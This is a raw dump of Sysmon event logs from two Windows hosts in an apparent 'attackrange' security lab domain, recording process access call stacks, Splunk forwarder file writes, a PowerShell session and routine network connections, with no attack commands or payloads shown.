08:08:28.405{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810543Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:08:28.405{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810542Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:08:28.405{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810541Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:08:28.390{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810540Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:08:28.390{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810539Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:08:28.390{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810538Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:08:28.390{0C1E0330-048F-60E8-0500-00000000D001}412528C:\Windows\system32\csrss.exe{0C1E0330-F87C-60EB-E979-00000000D001}2356C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000810537Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:08:28.390{0C1E0330-050B-60E8-9B00-00000000D001}10203368C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0C1E0330-F87C-60EB-E979-00000000D001}2356C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000810536Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:08:28.390{0C1E0330-F87C-60EB-E979-00000000D001}2356C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{0C1E0330-048F-60E8-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000810535Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:08:28.077{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=373A836CBD022EA7D6DB7BF680AC6A1B,SHA256=EA143A7E7D15D55EF5EC6EABAA001F339BCFC64D387D76FC054DEBC1F5479884,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001054934Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:29.221{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=26E74BBBB5FAC05D5829F0A44584CAC4,SHA256=5B24DC50EE8988E4BEE750C5F5447695E7441EA1F7BCD68949B893C966B6670E,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000810552Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:08:28.215{0C1E0330-0490-60E8-0F00-00000000D001}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse89.248.165.74recyber.net48275-false10.0.1.15win-host-623.attackrange.local3389ms-wbt-server 23542300x8000000000000000810551Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:08:29.405{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=2E9A5BEDFEE55B4FA564E7C51D62CAE6,SHA256=7BE2ACC60D569FF0C323C91C4262EEB487AB301EBE9AE6E93DC318735E410164,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001054936Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:21.912{466BC892-02AD-60E8-0B00-00000000CF01}624C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsefalse10.0.1.15ip-10-0-1-15.eu-central-1.compute.internal57472-false10.0.1.14win-dc-890.attackrange.local49676- 23542300x80000000000000001054935Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:30.239{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8F73F75DDDC908D2298FA0EA7A749494,SHA256=576E74A49E99FE88270FF75C55763AD4690CEE2ABF5627B7FF0AC088BD0CF4A4,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000810555Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:08:28.538{0C1E0330-048F-60E8-0B00-00000000D001}628C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57472-false10.0.1.14ip-10-0-1-14.eu-central-1.compute.internal49676- 23542300x8000000000000000810554Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:08:30.218{0C1E0330-0490-60E8-1200-00000000D001}980NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive1.datMD5=E2C6E977ADCB88EA2BE7C07FD2DEB067,SHA256=F44F6951EFA90CB88DC686363BEB70E330739E38EB51C1A62520CECC8A1097B2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810553Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:08:30.093{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D4F0964A34892C9235196530A13CCED5,SHA256=D26D2FE683F49DF8BE38474686FE49B05D02CFE03B9E5CBE1644F4D68BC6EACC,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001054977Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:31.962{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-F87F-60EB-FE7D-00000000CF01}9608C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054976Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:31.909{466BC892-F87F-60EB-FE7D-00000000CF01}960810032C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\windows.storage.dll+1549f7|C:\Windows\System32\windows.storage.dll+154323|C:\Windows\System32\windows.storage.dll+1541a9|C:\Windows\System32\windows.storage.dll+27be5|C:\Windows\System32\windows.storage.dll+27b2d|C:\Windows\System32\windows.storage.dll+26076|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+5b44|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+42aa|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+2f6d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054975Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:31.909{466BC892-F87F-60EB-FE7D-00000000CF01}960810032C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\windows.storage.dll+154962|C:\Windows\System32\windows.storage.dll+154323|C:\Windows\System32\windows.storage.dll+1541a9|C:\Windows\System32\windows.storage.dll+27be5|C:\Windows\System32\windows.storage.dll+27b2d|C:\Windows\System32\windows.storage.dll+26076|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+5b44|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+42aa|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+2f6d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054974Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:31.909{466BC892-F87F-60EB-FE7D-00000000CF01}960810032C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6482|C:\Windows\System32\shcore.dll+617d|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\windows.storage.dll+154947|C:\Windows\System32\windows.storage.dll+154323|C:\Windows\System32\windows.storage.dll+1541a9|C:\Windows\System32\windows.storage.dll+27be5|C:\Windows\System32\windows.storage.dll+27b2d|C:\Windows\System32\windows.storage.dll+26076|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+5b44|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+42aa|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+2f6d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054973Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:31.909{466BC892-F87F-60EB-FE7D-00000000CF01}960810032C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6154|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\windows.storage.dll+154947|C:\Windows\System32\windows.storage.dll+154323|C:\Windows\System32\windows.storage.dll+1541a9|C:\Windows\System32\windows.storage.dll+27be5|C:\Windows\System32\windows.storage.dll+27b2d|C:\Windows\System32\windows.storage.dll+26076|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+5b44|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+42aa|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+2f6d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054972Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:31.909{466BC892-F87F-60EB-FE7D-00000000CF01}960810032C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6497|C:\Windows\System32\shcore.dll+6387|C:\Windows\System32\shcore.dll+62fd|C:\Windows\System32\shcore.dll+620a|C:\Windows\System32\windows.storage.dll+609de|C:\Windows\System32\windows.storage.dll+15427c|C:\Windows\System32\windows.storage.dll+154058|C:\Windows\System32\windows.storage.dll+27be5|C:\Windows\System32\windows.storage.dll+27b2d|C:\Windows\System32\windows.storage.dll+26076|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+5b44|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+42aa|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+2f6d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054971Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:31.909{466BC892-F87F-60EB-FE7D-00000000CF01}960810032C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6482|C:\Windows\System32\shcore.dll+617d|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\windows.storage.dll+609cc|C:\Windows\System32\windows.storage.dll+15427c|C:\Windows\System32\windows.storage.dll+154058|C:\Windows\System32\windows.storage.dll+27be5|C:\Windows\System32\windows.storage.dll+27b2d|C:\Windows\System32\windows.storage.dll+26076|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+5b44|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+42aa|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+2f6d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054970Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:31.909{466BC892-F87F-60EB-FE7D-00000000CF01}960810032C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6154|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\windows.storage.dll+609cc|C:\Windows\System32\windows.storage.dll+15427c|C:\Windows\System32\windows.storage.dll+154058|C:\Windows\System32\windows.storage.dll+27be5|C:\Windows\System32\windows.storage.dll+27b2d|C:\Windows\System32\windows.storage.dll+26076|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+5b44|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+42aa|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+2f6d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001054969Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:31.909{466BC892-F87F-60EB-FE7D-00000000CF01}9608ATTACKRANGE\bobC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\bob\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms~RFf783124.TMPMD5=2C0FD6F951FA1D507F7B5C46BB749BFE,SHA256=500857DA7D87C376CB267338351A1D967C9EA82A3709662A2377A28AD4E79CBF,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001054968Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:31.880{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-F87F-60EB-FE7D-00000000CF01}9608C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054967Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:31.791{466BC892-02B0-60E8-1600-00000000CF01}13044400C:\Windows\System32\svchost.exe{466BC892-F87F-60EB-FE7D-00000000CF01}9608C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054966Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:31.791{466BC892-02B0-60E8-1600-00000000CF01}13041340C:\Windows\System32\svchost.exe{466BC892-F87F-60EB-FE7D-00000000CF01}9608C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\System32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054965Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:31.760{466BC892-32D3-60E8-770B-00000000CF01}63569744C:\Windows\Explorer.EXE{466BC892-F87F-60EB-FE7D-00000000CF01}9608C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61d9f|C:\Windows\System32\SHELL32.dll+62945|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054964Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:31.760{466BC892-32D3-60E8-770B-00000000CF01}63569744C:\Windows\Explorer.EXE{466BC892-F87F-60EB-FE7D-00000000CF01}9608C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6285e|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 